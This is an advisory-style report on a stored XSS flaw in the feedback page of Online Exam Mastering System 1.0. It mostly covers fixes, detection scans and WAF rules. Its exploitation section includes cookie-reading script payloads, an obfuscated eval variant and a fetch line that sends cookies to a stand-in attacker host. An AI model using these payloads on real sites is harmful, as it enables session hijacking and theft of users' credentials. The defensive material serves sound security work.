How the CVE Works:
CVE-2025-28121 is a stored Cross-Site Scripting (XSS) vulnerability in `feedback.php` of the Online Exam Mastering System 1.0. The flaw stems from improper sanitization of the `q` parameter, which lets an attacker submit a JavaScript payload that is persisted with the feedback entry. When an admin or user later views the feedback section, the stored payload executes in their browser, enabling session hijacking, defacement, or remote code execution. The attack requires no authentication, making it critical.
DailyCVE Form:
Platform: code-projects
Version: 1.0
Vulnerability: Stored XSS
Severity: Critical
Date: 04/24/2025
What Undercode Says:
Exploitation:
1. Craft a malicious URL or form submission:
http://example.com/feedback.php?q=<script>alert(document.cookie)</script>
2. Use obfuscation to bypass filters:
<img src=x onerror=eval(atob('YWxlcnQoJ1hTUycp'))>
3. Exfiltrate admin cookies via XSS:
fetch('https://attacker.com/steal?data='+document.cookie);
Protection:
1. Sanitize `q` parameter with PHP’s `htmlspecialchars()`:
$q = htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');
2. Implement a Content Security Policy (CSP) that omits `'unsafe-inline'`, since that keyword would re-allow exactly the inline `<script>` and `onerror` handlers this flaw injects:
Content-Security-Policy: default-src 'self'; script-src 'self'
3. Use HTTP-only cookies:
ini_set("session.cookie_httponly", 1);
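The three protections above combined in one feedback handler, shown as an added example that is not code from the Online Exam Mastering System: the vulnerable pattern the report describes sits beside a hardened version that validates on input and encodes on output. The SQLite table `feedback(q)` and the allow-list regex are assumptions made for this illustration.

```php
<?php
// Added example, not the project's code. Assumes an SQLite table
// feedback(id, q) created below; the table/column names are assumptions.
ini_set('session.cookie_httponly', 1);   // session cookie is unreadable from JS
header("Content-Security-Policy: default-src 'self'; script-src 'self'"); // no inline script/onerror
session_start();

$db = new PDO('sqlite:feedback.db');
$db->exec('CREATE TABLE IF NOT EXISTS feedback (id INTEGER PRIMARY KEY, q TEXT)');

// --- VULNERABLE (the pattern in the report; shown for contrast, never called) ---
function store_feedback_vulnerable(PDO $db): void {
    $q = $_GET['q'] ?? '';
    $db->prepare('INSERT INTO feedback (q) VALUES (?)')->execute([$q]);
}
function render_feedback_vulnerable(PDO $db): void {
    foreach ($db->query('SELECT q FROM feedback') as $row) {
        echo '<li>' . $row['q'] . '</li>';   // raw stored markup runs in every viewer's browser
    }
}

// --- HARDENED: allow-list on input, HTML-encode on output ---
function store_feedback_safe(PDO $db): void {
    $q = $_GET['q'] ?? '';
    // Allow-list of letters, digits, whitespace and basic punctuation (assumed policy).
    // The D modifier anchors $ at the true end, so a trailing newline cannot slip past.
    if ($q === '' || strlen($q) > 2000 || !preg_match('/^[\p{L}\p{N}\s.,!?\'-]+$/uD', $q)) {
        http_response_code(400);
        exit('Invalid input');
    }
    $db->prepare('INSERT INTO feedback (q) VALUES (?)')->execute([$q]);
}
function render_feedback_safe(PDO $db): void {
    foreach ($db->query('SELECT q FROM feedback') as $row) {
        // Output encoding is what actually stops stored XSS; it also covers
        // rows that were written before the input filter existed.
        echo '<li>' . htmlspecialchars($row['q'], ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</li>';
    }
}

if (isset($_GET['q'])) {
    store_feedback_safe($db);
}
echo '<ul>';
render_feedback_safe($db);
echo '</ul>';
```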
Detection:
1. Scan with `nmap`'s stored-XSS NSE script, which submits marker strings to every form and searches the site for them:
nmap -p 80 --script http-stored-xss <target>
2. Automated XSS testing with `wapiti` (sqlmap tests SQL injection, not XSS); the `permanentxss` module covers the stored case:
wapiti -u "http://example.com/feedback.php?q=test" -m xss,permanentxss
Mitigation:
- Patch `feedback.php` to validate input against an allow-list regex (the `D` modifier prevents a trailing-newline bypass of `$`, and `?? ''` avoids a warning when `q` is absent):
if (!preg_match('/^[a-zA-Z0-9\s]+$/D', $_GET['q'] ?? '')) { die("Invalid input"); }
- Deploy WAF rules to block XSS patterns (nginx with the ModSecurity connector; the engine must be on and each rule needs an id and phase):
location ~ \.php$ { modsecurity on; modsecurity_rules 'SecRuleEngine On
SecRule ARGS "@detectXSS" "id:1001,phase:2,deny,status:403,log"'; }
Analytics:
- Attack Vector: Network (Low Complexity)
- Impact: Confidentiality (High), Integrity (High)
- CVSS 4.0 Score: 9.6 (Critical)
- Exploitability: No Privileges Required
End of Report.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode